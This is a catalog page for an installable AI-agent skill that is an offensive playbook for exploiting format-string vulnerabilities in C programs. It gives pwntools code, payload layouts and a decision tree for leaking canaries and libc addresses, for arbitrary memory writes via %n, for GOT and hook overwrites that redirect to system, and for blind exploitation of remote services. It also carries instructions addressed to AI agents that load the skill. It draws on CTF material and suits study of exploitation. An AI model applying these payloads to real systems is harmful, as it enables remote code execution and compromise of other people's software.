format-string-exploitation
Format string exploitation playbook. Use when printf-family functions receive user-controlled format strings, enabling arbitrary stack reads (%p/%s), arbitrary memory writes (%n/%hn/%hhn), GOT/hook overwrites, and canary/libc/PIE leaks.
How do I install this agent skill?
npx skills add https://github.com/yaklang/hack-skills --skill format-string-exploitationIs this agent skill safe to install?
- Gen Agent Trust Hubpass
This skill is a technical playbook for format string exploitation, providing educational guidance and templates for security research. It contains no malicious code, exfiltration patterns, or instructions to bypass safety guidelines.
- Socketwarn
1 alert: gptSecurity
- Snykfail
Risk: CRITICAL · 2 issues
- ZeroLeakspass
1 finding · Score: 86/100
What does this agent skill do?
SKILL: Format String Exploitation — Expert Attack Playbook
AI LOAD INSTRUCTION: Expert format string techniques. Covers stack reading, arbitrary write via %n, GOT overwrite, __malloc_hook overwrite, pointer chain exploitation, blind format string, FORTIFY_SOURCE bypass, 64-bit null byte handling, and pwntools automation. Distilled from ctf-wiki fmtstr, CTF patterns, and real-world scenarios. Base models often miscalculate positional parameter offsets or forget 64-bit address placement after format string.
0. RELATED ROUTING
- stack-overflow-and-rop — combine format string leak with stack overflow for full exploit
- binary-protection-bypass — format string is the primary canary/PIE/ASLR leak method
- arbitrary-write-to-rce — convert format string write primitive to code execution targets
- heap-exploitation — heap address leak via format string for heap exploitation
1. VULNERABILITY IDENTIFICATION
Vulnerable Pattern
printf(user_input); // VULNERABLE: user controls format string
fprintf(fp, user_input); // VULNERABLE
sprintf(buf, user_input); // VULNERABLE
snprintf(buf, sz, user_input); // VULNERABLE
printf("%s", user_input); // SAFE: format string is fixed
Quick Test
Input: AAAA%p%p%p%p%p%p%p%p
If output shows stack values (hex addresses): format string confirmed
Look for 0x4141414141414141 in output to find your input offset
2. READING MEMORY
Stack Leak (%p)
| Format | Action | Use |
|---|---|---|
%p | Print next stack value as pointer | Sequential stack dump |
%N$p | Print N-th parameter as pointer | Direct positional access |
%N$lx | Same as %p but explicit hex (64-bit) | Portable |
%N$s | Dereference N-th parameter as string pointer | Read memory at pointer value |
Finding Your Input Offset
# Send: AAAAAAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p
# Output: AAAAAAAA.0x7ffd12340000.0x0.(nil).0x7f1234567890.0x4141414141414141...
# ↑ offset = 6 (example)
# Or automated:
for i in range(1, 30):
io.sendline(f'AAAA%{i}$p')
if '0x41414141' in io.recvline():
print(f'Offset = {i}')
break
Leaking Specific Values
| Target | Method | Stack Position |
|---|---|---|
| Canary | %N$p where N = canary offset from format string | Typically at offset buf_size/8 + few |
| Saved RBP | %N$p (just above return address) | Leaks stack address → stack base |
| Return address | %N$p | Leaks .text address (PIE base = leak & ~0xfff - offset) |
| Libc address | %N$p where N points to __libc_start_main+XX return on stack | libc base = leak - offset |
Reading Arbitrary Address (%s)
# 32-bit: place address at start of format string
payload = p32(target_addr) + b'%N$s' # N = offset where target_addr appears on stack
# 64-bit: address contains null bytes → place AFTER format specifiers
payload = b'%8$sAAAA' + p64(target_addr) # %8$s reads from offset 8 where address is
3. WRITING MEMORY (%n)
Write Specifiers
| Specifier | Bytes Written | Width |
|---|---|---|
%n | 4 bytes (int) | Characters printed so far |
%hn | 2 bytes (short) | Characters printed so far (mod 0x10000) |
%hhn | 1 byte (char) | Characters printed so far (mod 0x100) |
%ln | 8 bytes (long) | Characters printed so far |
Arbitrary Write Technique
Goal: Write value V to address A.
32-bit (address on stack directly):
# Write 2 bytes at a time using %hn
# Place target addresses in format string (they'll be on stack)
payload = p32(target_addr) # for low 2 bytes
payload += p32(target_addr + 2) # for high 2 bytes
# Calculate padding for each %hn write
low = value & 0xffff
high = (value >> 16) & 0xffff
payload += f'%{low - 8}c%{offset}$hn'.encode()
payload += f'%{(high - low) & 0xffff}c%{offset+1}$hn'.encode()
64-bit (address AFTER format string):
# Addresses contain null bytes (0x00007fXXXXXXXX) which terminate string
# Solution: place addresses AFTER the format specifiers
# Step 1: format string portion (no null bytes)
fmt = b'%Xc%N$hn%Yc%M$hn'
# Step 2: pad to 8-byte alignment
fmt = fmt.ljust(align, b'A')
# Step 3: append target addresses
fmt += p64(target_addr)
fmt += p64(target_addr + 2)
Byte-by-Byte Write with %hhn
Write one byte at a time for precision (6 writes for full 48-bit address on 64-bit):
writes = {}
for i in range(6):
byte_val = (value >> (i * 8)) & 0xff
writes[target_addr + i] = byte_val
# pwntools handles the math:
from pwn import fmtstr_payload
payload = fmtstr_payload(offset, writes, numbwritten=0, write_size='byte')
4. PWNTOOLS fmtstr_payload()
from pwn import *
# Overwrite GOT entry with target address
payload = fmtstr_payload(
offset, # stack offset where input appears
{elf.got['printf']: libc.symbols['system']}, # {addr: value}
numbwritten=0, # bytes already output before our input
write_size='short' # 'byte', 'short', or 'int'
)
# For 64-bit with addresses after format string:
# fmtstr_payload handles this automatically
FmtStr Class (Interactive Exploitation)
from pwn import *
def send_payload(payload):
io.sendline(payload)
return io.recvline()
fmt = FmtStr(execute_fmt=send_payload)
# fmt.offset is auto-detected
fmt.write(elf.got['printf'], libc.symbols['system'])
fmt.execute_writes()
5. GOT OVERWRITE VIA FORMAT STRING
Common Targets
| Overwrite | With | Trigger |
|---|---|---|
printf@GOT | system | Next printf(user_input) → system(user_input), send /bin/sh |
strlen@GOT | system | If strlen(user_input) called |
puts@GOT | system | If puts(user_input) called |
atoi@GOT | system | If atoi(user_input) called (send sh as "number") |
__stack_chk_fail@GOT | Controlled addr | Bypass canary check entirely |
exit@GOT | main | Create infinite loop for multi-shot exploit |
Hook Targets (glibc < 2.34)
| Target | One-gadget | Trigger |
|---|---|---|
__malloc_hook | one_gadget addr | Any printf with large format → internal malloc |
__free_hook | system | Trigger free("/bin/sh") |
6. STACK POINTER CHAIN EXPLOITATION
When format string is not directly on the stack (e.g., stored in a heap buffer referenced by stack pointer), use pointer chains on the stack to achieve arbitrary write.
Two-Stage Write
Stack:
[offset A] → ptr_X (stack address pointing to another stack address)
[offset B] → ptr_Y (target of ptr_X)
Stage 1: Use %A$hn to modify ptr_X's low bytes → ptr_X now points to target_addr
Stage 2: Use %B$n to write through the modified ptr_X → writes to target_addr
This requires finding existing pointer chains on the stack (e.g., saved frame pointers forming a chain: rbp → prev_rbp → prev_prev_rbp).
Finding Pointer Chains
# Leak stack with %p, look for:
# 1. Stack address A at offset N that points to another stack address B
# 2. Stack address B at offset M
# Modify value at A (using %N$hn) to change where B points
# Then write through B (using %M$hn) to target
7. BLIND FORMAT STRING
Remote service, no binary, no source — exploit format string blind.
Methodology
| Step | Action | Purpose |
|---|---|---|
| 1 | Send %p × 50 | Dump stack, identify address patterns |
| 2 | Identify offsets | Find libc addrs (0x7f...), stack addrs (0x7ff...), code addrs |
| 3 | Find input offset | Send AAAA%N$p for N=1..50, find 0x41414141 |
| 4 | Identify binary base | Code addresses reveal PIE base (or fixed base if no PIE) |
| 5 | Leak GOT entries | If binary base known, read GOT via %N$s with GOT address |
| 6 | Calculate libc base | GOT value - libc symbol offset |
| 7 | Overwrite GOT | %n to rewrite GOT entry with system address |
8. FORTIFY_SOURCE BYPASS
FORTIFY_SOURCE (gcc -D_FORTIFY_SOURCE=2) replaces printf with __printf_chk which forbids %N$n (positional writes).
Bypass Techniques
| Method | Detail |
|---|---|
Use %hn sequentially (no positional) | Print exact byte count, %hn, adjust, %hn — fragile but works |
| Stack-based exploit | If format string is on stack, use non-positional %n with stack position control |
| Heap overflow instead | FORTIFY doesn't protect heap — combine with heap bug |
| Return-to-printf | ROP to call unfortified printf (if available in binary or libc) |
9. 64-BIT CONSIDERATIONS
| Challenge | Solution |
|---|---|
Addresses contain \x00 (null byte terminates format string) | Place addresses AFTER format specifiers, pad to alignment |
| Address width: 6 significant bytes | Write 3 × %hn (2 bytes each) or 6 × %hhn |
| Larger stack offset range | Input may be at offset 6+ due to 6 register args saved |
| 48-bit address space | Only bottom 48 bits of 64-bit used |
Layout Template (64-bit)
[format_string_specifiers][padding_to_8byte_align][addr1][addr2][addr3]...
← no null bytes here → ← null bytes OK (after fmt) →
10. DECISION TREE
Format string vulnerability confirmed (printf(user_input))
├── FORTIFY_SOURCE enabled? (__printf_chk)
│ ├── YES → positional %n blocked
│ │ ├── Sequential %n possible? → non-positional write
│ │ └── Combine with another primitive (heap, ROP)
│ └── NO → full positional %n available
├── What do you need first?
│ ├── Leak canary → %N$p at canary stack offset
│ ├── Leak PIE base → %N$p at return address offset → base = leak - known_offset
│ ├── Leak libc base → %N$p at __libc_start_main return on stack
│ ├── Leak heap base → %N$p at heap pointer on stack
│ └── Leak specific address → %N$s with target address on stack
├── Architecture?
│ ├── 32-bit → addresses at start of format string
│ └── 64-bit → addresses after format string (null byte issue)
├── Write target?
│ ├── Partial RELRO → GOT overwrite (printf→system, atoi→system)
│ ├── Full RELRO → __malloc_hook or __free_hook (pre-2.34)
│ ├── Full RELRO + glibc ≥ 2.34 → target _IO_FILE, exit_funcs, TLS_dtor_list
│ └── Stack return address → direct overwrite (if ASLR bypassed)
├── Single-shot or multi-shot?
│ ├── Loop (multi-shot) → overwrite GOT entry incrementally, use pointer chains
│ └── One-shot → fmtstr_payload() with all writes in single payload
└── Input not on stack? (heap buffer)
└── Use stack pointer chains for indirect writes
How can the creator link this skill?
Add the canonical catalog link to the repository README so users can inspect current installs and available audits. The publishing guide covers the complete discovery path.
<a href="https://skillzs.dev/skills/yaklang/hack-skills/format-string-exploitation">View format-string-exploitation on skillZs</a>